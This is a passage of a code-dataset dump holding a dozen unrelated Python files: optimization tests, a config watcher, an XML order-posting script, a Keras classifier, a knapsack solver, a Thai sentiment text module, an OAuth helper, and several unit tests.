sharing'\nscenariolist[2]['pars'] = [dict()]\nscenariolist[2]['pars'][0]['names'] = ['sharing']\nscenariolist[2]['pars'][0]['pops'] = 7\nscenariolist[2]['pars'][0]['startyear'] = 2002\nscenariolist[2]['pars'][0]['endyear'] = 2015\nscenariolist[2]['pars'][0]['startval'] = 0.0\nscenariolist[2]['pars'][0]['endval'] = 0.0\n\n\nprint('\\n\\n\\n4. Running scenarios...')\nfrom scenarios import runscenarios\nD = runscenarios(D, scenariolist=scenariolist, verbose=verbose)\n\n\n\n\n\n\n\n\n\n\n\nprint('\\n'*spaces)\nprint('======================================================================')\nprint(' TESTING OPTIMIZATION')\nprint('======================================================================')\n\n\n\n\ntestconstant = False\ntestmultibudget = False\ntesttimevarying = False\ntestmultiyear = False\ntestconstraints = True\n\n\n## Set parameters\nprojectname = 'example'\nverbose = 10\nntimepm = 2 # AS: Just use 1 or 2 parameters... using 3 or 4 can cause problems that I'm yet to investigate\nmaxiters = 1e3\nmaxtime = 20 # Don't run forever :)\n\nif maxtime:\n from time import time\n starttime = time()\n def stoppingfunc():\n if time()-starttime>maxtime:\n return True\n else:\n return False\nelse:\n stoppingfunc = None\n \n\n\nif testconstant:\n print('\\n\\n\\n3. Running constant-budget optimization...')\n from optimize import optimize, defaultobjectives\n objectives = defaultobjectives(D, verbose=verbose)\n optimize(D, objectives=objectives, maxiters=maxiters, stoppingfunc=stoppingfunc, verbose=verbose)\n\n\nif testtimevarying:\n print('\\n\\n\\n4. Running constant-budget optimization...')\n from optimize import optimize, defaultobjectives\n objectives = defaultobjectives(D, verbose=verbose)\n objectives['timevarying'] = True\n optimize(D, objectives=objectives, maxiters=maxiters, stoppingfunc=stoppingfunc, verbose=verbose)\n\n\nif testmultiyear:\n print('\\n\\n\\n5. Running multi-year-budget optimization...')\n from optimize import optimize, defaultobjectives\n objectives = defaultobjectives(D, verbose=verbose)\n objectives['funding'] = 'variable'\n objectives['outcome']['variable'] = [6e6, 5e6, 3e6, 4e6, 3e6, 6e6] # Variable budgets\n optimize(D, objectives=objectives, maxiters=maxiters, stoppingfunc=stoppingfunc, verbose=verbose)\n\n\nif testmultibudget:\n print('\\n\\n\\n6. Running multiple-budget optimization...')\n from optimize import optimize, defaultobjectives\n objectives = defaultobjectives(D, verbose=verbose)\n objectives['funding'] = 'range'\n objectives['outcome']['budgetrange']['minval'] = 0\n objectives['outcome']['budgetrange']['maxval'] = 1\n objectives['outcome']['budgetrange']['step'] = 0.5\n optimize(D, objectives=objectives, maxiters=maxiters, stoppingfunc=stoppingfunc, verbose=verbose)\n\n\nif testconstraints:\n print('\\n\\n\\n7. Running constrained constant-budget optimization...')\n from optimize import optimize, defaultobjectives, defaultconstraints\n objectives = defaultobjectives(D, verbose=verbose)\n constraints = defaultconstraints(D, verbose=verbose)\n constraintkeys = ['yeardecrease', 'yearincrease', 'totaldecrease', 'totalincrease']\n for key in constraintkeys:\n for p in range(D['G']['nprogs']):\n constraints[key][p]['use'] = True # Turn on all constraints\n optimize(D, objectives=objectives, maxiters=maxiters, stoppingfunc=stoppingfunc, verbose=verbose)\n","sub_path":"server/src/sim/test_optima.py","file_name":"test_optima.py","file_ext":"py","file_size_in_byte":7450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330083837","text":"import pytoml as toml\nimport pyinotify\n\nfrom pyautodl.config_parser import parse_config\n\n\nclass ConfigFileWatcher(pyinotify.ProcessEvent):\n compositor = None\n\n def my_init(self, **kargs):\n self.compositor = kargs['compositor']\n\n def process_IN_MODIFY(self, event):\n print(\"Config file modified. Updating caches...\")\n with open('config.toml', 'rb') as inner_toml:\n config = toml.load(inner_toml)\n self.compositor.set_maps(parse_config(config))\n print(\"Caches updated!\")\n","sub_path":"pyautodl/config_file_watcher.py","file_name":"config_file_watcher.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"245099611","text":"import pandas as pd\nimport numpy as np\nimport requests\n\ndata = pd.read_excel(\"./PreOrders_210423.xlsx\",sheet_name=\"Sheet1\")\nheader = data.columns\nvalues = data.values\nxml = \"\"\nvaluesArray = []\nfor i in range(0,len(values)):\n d = values[i]\n xml = \"\"\n for h in range(0,len(header)):\n if (str(header[h]) == \"LineItem\"):\n xml+=\"<\"+str(header[h])+\">\"+\"0000\"+str(d[h])+\"\"\n else:\n xml+=\"<\"+str(header[h])+\">\"+str(d[h])+\"\"\n xml = xml.replace(str(np.nan),\"\")\n xml+=\"\"\n valuesArray.append(xml)\n xml = \"\"\nprint(valuesArray)\n\nfor v in valuesArray:\n xml = v\n headers = {'Content-Type': 'application/xml'} # set what your server accepts\n print (requests.post('https://atlas-dev.smythstoys.com/api/sap/order-new',verify=False, data=xml, headers=headers).text)","sub_path":"xmtojsonpy.py","file_name":"xmtojsonpy.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"426156499","text":"# !/usr/bin/env python\n# --------------------------------------------------------------\n# File: testFlight.py\n# Project: Code\n# Created: Friday, 3rd May 2019 10:56:10 am\n# @Author: molin@live.cn\n# Last Modified: Friday, 3rd May 2019 10:56:32 am\n# Copyright © Rockface 2018 - 2019\n# --------------------------------------------------------------\n\nimport os, sys\nimport fileinput\nimport dataAnalysis\nimport pandas as pd\nimport numpy as np\nimport time\nimport plot\ninPath = \"/Users/meow/Desktop/DP/Code/Output/MOEA-D/Test28/EP.txt\"\n\ndef formatConfig(outPath):\n\tfor algorithmType in os.listdir(outPath):\n\t\tif not os.path.isdir(os.path.join(outPath, algorithmType)):\n\t\t\tcontinue\n\t\tfor testFolder in os.listdir(os.path.join(outPath, algorithmType)):\n\t\t\ttempPath = os.path.join(os.path.join(outPath, algorithmType), testFolder)\n\t\t\t#print(\"Processing:%s\"%tempPath)\n\t\t\ttempPath = os.path.join(tempPath, \"EP.txt\")\n\t\t\tif not os.path.exists(tempPath):\n\t\t\t\tcontinue\n\n#print(inPath[:-4])\n\ndef deleteHV(inPath):\n\t\n\tprint(inPath)\n\ti = 0\n\taddList=[]\n\tfor line in fileinput.input(inPath):\n\t\tif i < 5:\n\t\t\taddList.append(line)\n\t\t\ti+=1\n\t\telse:\n\t\t\tfileinput.close()\n\t\t\tbreak\n\tf = open(inPath, 'w')\n\tfor line in addList:\n\t\tf.write(line)\n\ndef deleteHVOP(inPath):\n\tfor folder in os.listdir(inPath):\n\t\tif folder[0]=='.':\n\t\t\tcontinue\n\t\ttempConfig = os.path.join(inPath, folder)\n\t\tConfig = os.path.join(tempConfig, 'config.txt')\n\t\tif not os.path.exists(tempConfig):\n\t\t\tcontinue\n\t\tdeleteHV(Config)\ndef hvOp(inPath):\n\tfor folder in os.listdir(inPath):\n\t\tif folder[0]=='.':\n\t\t\tcontinue\n\t\ttempConfig = os.path.join(inPath, folder)\n\t\tConfig = os.path.join(tempConfig, 'config.txt')\n\t\tif not os.path.exists(tempConfig):\n\t\t\tcontinue\n\t\tdataAnalysis.analysisPF(tempConfig)\n\t\t\n\n#hvOp(\"/Users/meow/Desktop/DP/MOEA-D/Output/NSGA-II\")\n\ndef formatResource(inPath):\n\tdata = pd.read_csv(inPath, sep='\\t')\n\toutPath = inPath[:-4]+'_risk.txt'\n\tdata.sort_values(by='Risk', ascending=False).to_csv(outPath, sep='\\t', index=False)\n#formatResource(\"/Users/meow/Desktop/DP/MOEA-D/Resource/10000.csv\")\nstart_s1 = time.time()\nprint(\"[Start]\\tCollecting Pareto Front\")\n#dataAnalysis.epochValue(\"/Users/meow/Desktop/DP/MOEA-D/Output/MOEA-D/Test110/EP_epoch.txt\")\n#plot.mat_plotLine(\"/Users/meow/Desktop/DP/MOEA-D/Output/MOEA-D/Test110/EP_epoch_record.csv\")\ndataAnalysis.analysisPF(\"/Users/meow/Desktop/DP/MOEA-D/Output/MOEA-D/Test91\")\nend_s1 = time.time()\nprint(\"[End]\\t%s\"%(end_s1-start_s1))","sub_path":"testFlight.py","file_name":"testFlight.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"227532441","text":"# classification mlp model for the abalone dataset\nfrom numpy import unique\nfrom numpy import argmax\nfrom pandas import read_csv\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\n\n\n# load dataset\nurl = 'https://raw.githubusercontent.com/jbrownlee/Datasets/master/abalone.csv'\ndataframe = read_csv(url, header=None)\ndataset = dataframe.values\n# split into input (X) and output (y) variables\nX, y = dataset[:, 1:-1], dataset[:, -1]\nX, y = X.astype('float'), y.astype('float')\nn_features = X.shape[1]\n# encode strings to integer\ny = LabelEncoder().fit_transform(y)\nprint(y)\nn_class = len(unique(y))\n# split data into train and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=1)\n# define the keras model\nmodel = Sequential()\nmodel.add(Dense(20, input_dim=n_features, activation='relu', kernel_initializer='he_normal'))\nmodel.add(Dense(10, activation='relu', kernel_initializer='he_normal'))\nmodel.add(Dense(n_class, activation='softmax'))\n# compile the keras model\nmodel.compile(loss='sparse_categorical_crossentropy', optimizer='adam')\n# fit the keras model on the dataset\nmodel.fit(X_train, y_train, epochs=150, batch_size=32, verbose=2)\n# evaluate on test set\nyhat = model.predict(X_test)\nyhat = argmax(yhat, axis=-1).astype('int')\nacc = accuracy_score(y_test, yhat)\nprint('Accuracy: %.3f' % acc)","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"517251305","text":"\"\"\"\nклассический рюкзак с неограниченными повторами \nдинамическое снизу вверх\n\"\"\"\n\nw = 10\nweights = [6,3,4,2]\ncosts = [30,14,16,9]\n\ndef fill_backpack(w, weights, costs):\n d = [0 for i in range(w+1)]\n \n for rw in range(w+1):\n mx = 0\n for i in range(len(weights)):\n if rw - weights[i] >= 0:\n mx = max(mx, d[rw - weights[i]] + costs[i])\n print(mx)\n d[rw] = mx\n print(d)\n return d[w]\n\n\nprint(fill_backpack(w, weights, costs)) \n ","sub_path":"dynamic-programming/backpack-classic-repeats.py","file_name":"backpack-classic-repeats.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"58003316","text":"\n# coding: utf-8\n\n# In[27]:\n\nimport pandas as pd\npd.set_option('display.max_rows', 500)\n\n\n# In[30]:\n\nbasic_stats=pd.DataFrame.from_csv('/Users/katya/Desktop/bruno_mega/basicstats/basicstats.txt', index_col=4, sep='\\t')\nbasic_stats.drop(basic_stats.columns[[0,1,2,3,4,9,10,12]], axis=1, inplace=True)\n\n\n# In[32]:\n\nbasic_stats.to_csv('/Users/katya/Desktop/bruno_mega/basicstats/basicstats.txt',sep='\\t')\n\n\n# In[ ]:\n\n\n\n","sub_path":"basic_stats.py","file_name":"basic_stats.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"340840440","text":"import torch\nimport os\nimport sys\nimport json\nimport numpy as np\nimport pandas as pd\nfrom tqdm.auto import tqdm\nimport collections\nimport string\nimport re\nimport transformers\nfrom transformers import (\n AutoTokenizer,\n AutoModelForSequenceClassification,\n pipeline,\n)\nfrom thai2transformers import preprocess\nfrom thai2transformers.preprocess import process_transformers\n\n#Parameters:\nparam_smooth = 10\nparam_threshold = 0.9\nparam_span = 4\n\nparam_backoff_limit = 3\n\ndef read_text_file(filename):\n f = open(f'./data/preprocessed/{filename}', \"r\", encoding=\"utf-8\")\n d_ = []\n for x in f:\n d_.append(x.strip())\n return d_\n\ndef read_all_datasets():\n d_pos = read_text_file('pos_post_process_all.txt')\n d_neg = read_text_file('neg_post_process_all.txt')\n\n tcas_pos = read_text_file('tcas61_pos.txt')\n tcas_neg = read_text_file('tcas61_neg.txt')\n\n review_pos = read_text_file('review_shopping_pos.txt')\n review_neg = read_text_file('review_shopping_neg.txt')\n\n general_pos = read_text_file('general_pos.txt')\n general_neg = read_text_file('general_neg.txt')\n\n all_pos = d_pos + tcas_pos + review_pos + general_pos\n all_neg = d_neg + tcas_neg + review_neg + general_neg\n\n return all_pos, all_neg\n\n\ntokenizer = AutoTokenizer.from_pretrained('airesearch/wangchanberta-base-att-spm-uncased',\n revision='finetuned@wisesight_sentiment')\n\nmodel = AutoModelForSequenceClassification.from_pretrained('airesearch/wangchanberta-base-att-spm-uncased',\n revision='finetuned@wisesight_sentiment',\n output_attentions=False)\nclassify_multiclass = pipeline(task='sentiment-analysis',\n tokenizer=tokenizer,\n model = model)\n\n\n##################################\n##### Frequency Ratio Method #####\n\n##### N-granms ###################\n#ngram has punctuation\ndef has_punctuation(ngram): \n return True in [x in string.punctuation for x in ngram]\n\ndef generate_ngrams(lines, min_length=1, max_length=param_span):\n lengths = range(min_length, max_length + 1)\n ngrams = {length: [] for length in lengths}\n queue = collections.deque(maxlen=max_length)\n \n def add_queue():\n current = tuple(queue)\n for length in lengths:\n if len(current) >= length and not has_punctuation(current[:length]) and current[:length] not in ngrams[length]:\n ngrams[length].append(current[:length])\n \n short_by = 0\n for line in lines:\n short_by = max(0, max_length - len(lines))\n for word in tokenizer.tokenize(process_transformers(line)):\n queue.append(word)\n if len(queue) >= max_length-short_by:\n add_queue() \n\n while len(queue) > min_length:\n queue.popleft()\n add_queue()\n return ngrams\n\n#modified from & fixed their error of ngram with # of words < 4: https://gist.github.com/benhoyt/dfafeab26d7c02a52ed17b6229f0cb52\ndef count_ngrams(lines, min_length=1, max_length=param_span):\n \"\"\"Iterate through given lines iterator (file object or list of\n lines) and return n-gram frequencies. The return value is a dict\n mapping the length of the n-gram to a collections.Counter\n object of n-gram tuple and number of times that n-gram occurred.\n Returned dict includes n-grams of length min_length to max_length.\n \"\"\"\n lengths = range(min_length, max_length + 1)\n ngrams = {length: collections.Counter() for length in lengths}\n queue = collections.deque(maxlen=max_length)\n\n # Helper function to add n-grams at start of current queue to dict\n def add_queue():\n current = tuple(queue)\n for length in lengths:\n if len(current) >= length and not has_punctuation(current[:length]):\n ngrams[length][current[:length]] += 1\n\n # Loop through all lines and words and add n-grams to dict\n short_by = 0\n for line in lines:\n short_by = max(0, max_length - len(lines))\n # for word in line.split():\n for word in tokenizer.tokenize(process_transformers(line)):\n queue.append(word)\n if len(queue) >= max_length - short_by:\n add_queue()\n\n # Make sure we get the n-grams at the tail end of the queue\n while len(queue) > min_length:\n queue.popleft()\n add_queue()\n\n return ngrams\n\ndef get_counts(list1, counted_ngrams):\n counts = []\n list1_ngrams = generate_ngrams(list1)\n # print(list1_ngrams)\n list2_counts = counted_ngrams\n \n for length in range(param_span,0, -1):\n for v in list1_ngrams[length]:\n counts.append([list2_counts[length][v], v])\n return np.array(counts)\n\nclass ngrams_counts():\n global read_all_datasets, count_ngrams\n def __init__(self):\n all_pos, all_neg = read_all_datasets() \n self.pos_ngrams = count_ngrams(all_pos)\n self.neg_ngrams = count_ngrams(all_neg)\n\n##### Getting Attribute and Context #########\n\n#these are methods that will become useful when extracting attribute markers\n#why do we need all this? well... that's like 5 hours of debugging...\ndef flatten(foo):\n return list(_flatten(foo))\n\ndef _flatten(foo):\n for x in foo:\n if isinstance(x, collections.Iterable) and not isinstance(x, str):\n for y in _flatten(x):\n yield y\n else:\n yield x\n\ndef array_to_string(a):\n return ' '.join(flatten(a))\n\ndef is_in_string_array(elements, original): #deprecated, does not take into account sequence order\n the_elements = [x for x in array_to_string(elements).split() if x != '▁']\n the_original = array_to_string(original).split()\n # print('test:',the_elements,the_original,np.isin(the_elements, the_original).any())\n return np.isin(the_elements, the_original).any()\n\ndef insert_string(string, inserted_string, index):\n return string[:index] + inserted_string + string[index:]\n\n# modified from https://stackoverflow.com/questions/41752946/replacing-a-character-from-a-certain-index\ndef replace_string(s, newstring, index, nofail=False):\n # raise an error if index is outside of the string\n if not nofail and index not in range(len(s)):\n raise ValueError(\"index outside given string. index:\" + index)\n\n # if not erroring, but the index is still not in the correct range..\n if index < 0: # add it to the beginning\n return newstring + s\n if index > len(s): # add it to the end\n return s + newstring\n\n # insert the new string between \"slices\" of the original\n return s[:index] + newstring + s[index + len(newstring):]\n\ndef get_attribute_markers(s, style_src, pos_ngrams_counts, neg_ngrams_counts):\n sentence = [s]\n \n pos_counts = get_counts(sentence, pos_ngrams_counts)\n pythai_pos_counts = get_counts\n pos_ngrams = pos_counts[:,1]\n if len(pos_counts) > 0:\n pos_counts = pos_counts[:,0]\n \n neg_counts = get_counts(sentence, neg_ngrams_counts)\n neg_ngrams = neg_counts[:,1]\n if len(neg_counts) > 0:\n neg_counts = neg_counts[:,0]\n \n label = 'neg'\n if(style_src):\n importances = (pos_counts + param_smooth) / (neg_counts + param_smooth)\n ngrams = pos_ngrams\n label = 'pos'\n else:\n importances = (neg_counts + param_smooth) / (pos_counts + param_smooth)\n ngrams = neg_ngrams\n \n a = []\n\n importances = np.vstack((importances, ngrams)).T\n\n for importance in sorted(importances,key=lambda x:(x[0],-len(x[1])),reverse=True):\n if importance[0] > param_threshold and not is_in_string_array(importance[1], a) and classify_multiclass(' '.join(importance[1]))[0]['label']==label:\n a.append(' '.join(importance[1]))\n\n return a\n\ndef separate(sentence, style_src, pos_ngrams_counts, neg_ngrams_counts):\n attributes = get_attribute_markers(sentence, style_src, pos_ngrams_counts, neg_ngrams_counts)\n c = sentence\n\n replace_indexes = []\n for a in attributes:\n a_striped = a.strip('▁').replace(' ','')\n replace_index = -1\n replace_index = c.find(a_striped)\n replace_indexes.append(replace_index)\n if a_striped != \"\":\n c = c.replace(a_striped, \"\")\n \n if len(attributes) == 0:\n return {'c': c, 'a': [], 'i': [], 's': sentence}\n \n replace_indexes, attributes = zip(*sorted(zip(replace_indexes, attributes)))\n return {'c': c, 'a': attributes, 'i': replace_indexes, 's': sentence}\n\ndef get_c_and_a(sentence, style_src, pos_ngrams_counts, neg_ngrams_counts):\n sep_res = separate(sentence, style_src, pos_ngrams_counts, neg_ngrams_counts)\n c = re.sub(' +', ' ', sep_res['c'])\n a = sep_res['a']\n return c,a\n\ndef delete_negative(sentence, pos_ngrams_counts, neg_ngrams_counts):\n sep_res = separate(sentence, 0, pos_ngrams_counts, neg_ngrams_counts)\n c = re.sub(' +', ' ', sep_res['c'])\n a = sep_res['a']\n return a,c,sentence\n\n# import delete_module as delete\n# ngrams = delete.ngrams_counts()\n# delete_output = delete.delete_negative(src_sentence, ngrams.pos_ngrams, ngrams.neg_ngrams)\n### output example: (('แย่มาก',), 'ร้านนี้', 'ร้านนี้แย่มาก')","sub_path":"delete_module.py","file_name":"delete_module.py","file_ext":"py","file_size_in_byte":9290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"573015090","text":"from oauth2client import client\nfrom oauth2client import keyring_storage\nfrom oauth2client import tools\nimport os\n\n# Google API details for a native/installed application for API project grow-prod.\nCLIENT_ID = '578372381550-jfl3hdlf1q5rgib94pqsctv1kgkflu1a.apps.googleusercontent.com'\nCLIENT_SECRET = 'XQKqbwTg88XVpaBNRcm_tYLf' # Not so secret for installed apps.\nREDIRECT_URI = 'urn:ietf:wg:oauth:2.0:oob'\n\n\ndef get_credentials(scope, storage_key='Grow SDK'):\n username = os.getenv('AUTH_EMAIL_ADDRESS', 'default')\n storage = keyring_storage.Storage(storage_key, username)\n credentials = storage.get()\n if credentials is None:\n parser = tools.argparser\n if os.getenv('INTERACTIVE_AUTH'):\n args = []\n else:\n args = ['--noauth_local_webserver']\n flags, _ = parser.parse_known_args(args)\n flow = client.OAuth2WebServerFlow(CLIENT_ID, CLIENT_SECRET, scope,\n redirect_uri=REDIRECT_URI)\n credentials = tools.run_flow(flow, storage, flags)\n return credentials\n","sub_path":"grow/common/oauth.py","file_name":"oauth.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498573450","text":"# -*- coding: utf-8 -*-\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\n\nif 'django.contrib.flatpages' in settings.INSTALLED_APPS:\n from django.contrib.flatpages.models import FlatPage\n\n class FlatpageForm(forms.ModelForm):\n\n url = forms.RegexField(label=_(\"URL\"), max_length=100,\n help_text=_(\"Example: '/about/contact/'. Make sure to have leading\"\n \" and trailing slashes.\"),\n error_message=_(\"This value must contain only letters, numbers,\"\n \" underscores, dashes or slashes.\"),\n regex=r'^[-\\w/\\.~]+$')\n\n class Meta:\n model = FlatPage\n\n def __init__(self, *args, **kwargs):\n super(FlatpageForm, self).__init__(*args, **kwargs)\n if getattr(settings, 'USE_CKEDITOR', True):\n from ckeditor.widgets import CKEditorWidget\n\n self.fields['content'].widget = CKEditorWidget()\n","sub_path":"about/adminforms.py","file_name":"adminforms.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"400652421","text":"f = open('82.txt', 'r')\nmat = list(map(lambda x: list(map(int, x.split(','))),\n filter(lambda x: len(x) != 0, f.read().split('\\n'))))\n\nfor j in range(1, len(mat[0])):\n for i in range(len(mat) - 1):\n mat[i+1][j-1] = min(mat[i+1][j-1], mat[i][j-1] + mat[i][j])\n for i in range(len(mat) - 1, 0, -1):\n mat[i-1][j-1] = min(mat[i-1][j-1], mat[i][j-1] + mat[i][j])\n for i in range(len(mat)):\n mat[i][j] += mat[i][j-1]\n\nprint(min(map(lambda x: x[-1], mat)))\n","sub_path":"page02/82.py","file_name":"82.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"77842906","text":"# -*- coding:utf-8 -*-\nfrom schematics_proto3.models import Model\n\n\ndef parametrize_for(tag):\n def _decorator(func):\n func._paramertize_for = tag\n\n return func\n return _decorator\n\n\nclass CommonWrappersTests:\n\n field_type_class = NotImplemented\n protobuf_msg_class = NotImplemented\n\n def pytest_generate_tests(self, metafunc):\n param_rule = getattr(metafunc.function, '_paramertize_for', None)\n\n model_class_optional = self.get_model_class_optional()\n model_class_none_not_dumped = self.get_model_class_none_not_dumped()\n model_class_renamed = self.get_model_class_renamed()\n\n value = self.get_value()\n\n if param_rule == 'serializing + field set cases':\n metafunc.parametrize(\n 'field_name,model',\n [\n ('wrapped', model_class_optional({'wrapped': value})),\n ('wrapped', model_class_none_not_dumped({'wrapped': value})),\n ('custom_name', model_class_renamed({'custom_name': value})),\n ],\n ids=[\n 'optional+all_set',\n 'none_not_dumped+all_set',\n 'renamed+all_set',\n ]\n )\n if param_rule == 'not serializing + field unset cases':\n metafunc.parametrize(\n 'field_name,model',\n [\n ('wrapped', model_class_none_not_dumped({})),\n ],\n ids=[\n 'none_not_dumped+unset',\n ]\n )\n if param_rule == 'serializing + field unset cases':\n metafunc.parametrize(\n 'field_name,model',\n [\n ('wrapped', model_class_optional({})),\n ('custom_name', model_class_renamed({})),\n ],\n ids=[\n 'optional+unset',\n 'renamed+unset',\n ]\n )\n\n def get_model_class_optional(self):\n class ModelOptional(Model, protobuf_message=self.protobuf_msg_class):\n wrapped = self.field_type_class()\n\n return ModelOptional\n\n def get_model_class_none_not_dumped(self):\n class ModelNoneNotDumped(Model, protobuf_message=self.protobuf_msg_class):\n wrapped = self.field_type_class()\n\n class Options:\n serialize_when_none = False\n\n return ModelNoneNotDumped\n\n def get_model_class_renamed(self):\n class ModelFieldRenamed(Model, protobuf_message=self.protobuf_msg_class):\n custom_name = self.field_type_class(metadata=dict(protobuf_field='wrapped'))\n\n return ModelFieldRenamed\n\n # value getters\n\n def get_value(self):\n raise NotImplementedError()\n\n def get_zero_value(self):\n raise NotImplementedError()\n\n # test cases\n\n @parametrize_for('serializing + field set cases')\n def test_serialize_message__all_set(self, field_name, model):\n nat = model.to_native()\n pri = model.to_primitive()\n msg = model.to_protobuf()\n\n assert nat[field_name] == self.get_value()\n assert pri[field_name] == self.get_value()\n assert msg.wrapped.value == self.get_value()\n\n @parametrize_for('not serializing + field unset cases')\n def test_skip_serialize_message__unsets(self, field_name, model):\n nat = model.to_native()\n pri = model.to_primitive()\n msg = model.to_protobuf()\n\n assert nat == {}\n assert pri == {}\n assert msg.wrapped.value == self.get_zero_value()\n\n @parametrize_for('serializing + field unset cases')\n def test_serialize_message__unsets(self, field_name, model):\n nat = model.to_native()\n pri = model.to_primitive()\n msg = model.to_protobuf()\n\n assert nat[field_name] is None\n assert pri[field_name] is None\n assert msg.wrapped.value == self.get_zero_value()\n","sub_path":"tests/serializing/wrappers/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"48100832","text":"\n\nfrom xai.brain.wordbase.nouns._amnesty import _AMNESTY\n\n#calss header\nclass _AMNESTIED(_AMNESTY, ):\n\tdef __init__(self,): \n\t\t_AMNESTY.__init__(self)\n\t\tself.name = \"AMNESTIED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"amnesty\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_amnestied.py","file_name":"_amnestied.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"427284885","text":"from unittest import TestCase, skip\n\nfrom astropy import units as u\nimport numpy as np\n\nfrom mirage.util import Region, PixelRegion, Vec2D\n\n\nclass TestPixelRegion(TestCase):\n\n def testDelta_success(self):\n region = PixelRegion(dims=Vec2D(5, 5, \"m\"), resolution=Vec2D.unitless(4, 5))\n delta = region.delta\n\n expected = Vec2D(5 / 4, 5 / 5, \"m\")\n\n self.assertAlmostEqual(expected.x.value, delta.x.value)\n self.assertAlmostEqual(expected.y.value, delta.y.value)\n self.assertEqual(expected.unit, delta.unit)\n\n def testPixels_givesCoordinatesForCenterOfEachPixelOnGrid(self):\n region = PixelRegion(\n dims=Vec2D(3, 3, \"m\"),\n center=Vec2D(2, 2, \"m\"),\n resolution=Vec2D.unitless(3, 3),\n )\n\n actual = region.pixels\n\n expected = [\n [[1, 1], [2, 1], [3, 1]],\n [[1, 2], [2, 2], [3, 2]],\n [[1, 3], [2, 3], [3, 3]],\n ]\n\n self.assertListEqual(actual.value.tolist(), expected)\n self.assertEqual(actual.unit, \"m\")\n\n def testOutline_visualizes(self):\n region = Region(dims=Vec2D(5, 2, \"arcsec\"), center=Vec2D(7, 8, \"arcsec\"))\n perim = region.outline.value\n\n def testSubdivide_perfectSquare_givesRegionAsNonOverlappingSubsets(self):\n region = PixelRegion(dims=Vec2D(4, 4, \"m\"), resolution=Vec2D.unitless(4, 4))\n expected_pixels = region.pixels\n subgrids = region.subdivide(4) # 4 regions of 4 points each\n self.assertSubregionEqual(subgrids, region)\n\n def testSubdivide_rectangularSupergridRegion_success(self):\n region = PixelRegion(dims=Vec2D(4, 4, \"m\"), resolution=Vec2D.unitless(12, 12))\n expected_pixels = region.pixels\n subgrids = region.subdivide(6) # 4 regions of 4 points each\n self.assertSubregionEqual(subgrids, region)\n\n def testSubdivide_rectangularRegionAndSupergrid_success(self):\n region = PixelRegion(dims=Vec2D(4, 4, \"m\"), resolution=Vec2D.unitless(12, 24))\n expected_pixels = region.pixels\n subgrids = region.subdivide(6) # 4 regions of 4 points each\n self.assertSubregionEqual(subgrids, region)\n\n def testSubdivide_largeGrid_success(self):\n region = PixelRegion(dims=Vec2D(4, 4, \"m\"), resolution=Vec2D.unitless(30, 47))\n expected_pixels = region.pixels\n subgrids = region.subdivide(20) # 4 regions of 4 points each\n self.assertSubregionEqual(subgrids, region)\n\n def assertSubregionEqual(self, subregions, expected_region):\n from matplotlib import pyplot as plt\n\n subregion_coords = []\n expected_coords = []\n expected_pixels = expected_region.pixels\n for s in subregions:\n pixels = s.pixels\n for x in range(pixels.shape[0]):\n for y in range(pixels.shape[1]):\n subregion_coords.append(list(pixels[x, y].value))\n\n for x in range(expected_pixels.shape[0]):\n for y in range(expected_pixels.shape[1]):\n expected_coords.append(list(expected_pixels[x, y].value))\n\n subregion_coords = np.array(subregion_coords)\n expected_coords = np.array(expected_coords)\n\n # for region in subregions:\n # outline = region.outline\n # plt.plot(outline[:, 0], outline[:, 1])\n # plt.plot(expected_coords[:, 0], expected_coords[:, 1], '.r')\n # plt.plot(subregion_coords[:, 0], subregion_coords[:, 1], '.b')\n # plt.show()\n\n for region in subregions:\n self.assertAlmostEqual(region.delta.x.value, expected_region.delta.x.value)\n self.assertAlmostEqual(region.delta.y.value, expected_region.delta.y.value)\n\n self.assertApproxListEquals(subregion_coords, expected_coords)\n\n def assertApproxListEquals(self, coords_a, coords_b):\n self.assertEqual(len(coords_a), len(coords_b))\n found = False\n for coord in coords_a:\n closest_b = self.find_closest_to(coord, coords_b)\n r = np.sqrt((coord[0] - closest_b[0]) ** 2 + (coord[1] - closest_b[1]) ** 2)\n if r < 1e-6:\n found = True\n if not found:\n self.assertTrue(False, f\"Could not find equivalent coord to {coord}\")\n\n def find_closest_to(self, coord, coords):\n min_dist = 1e6\n best_found = None\n for test_coord in coords:\n r = np.sqrt((test_coord[0] - coord[0]) ** 2 + (test_coord[1] - coord[1]) ** 2)\n if r < min_dist:\n best_found = test_coord\n return 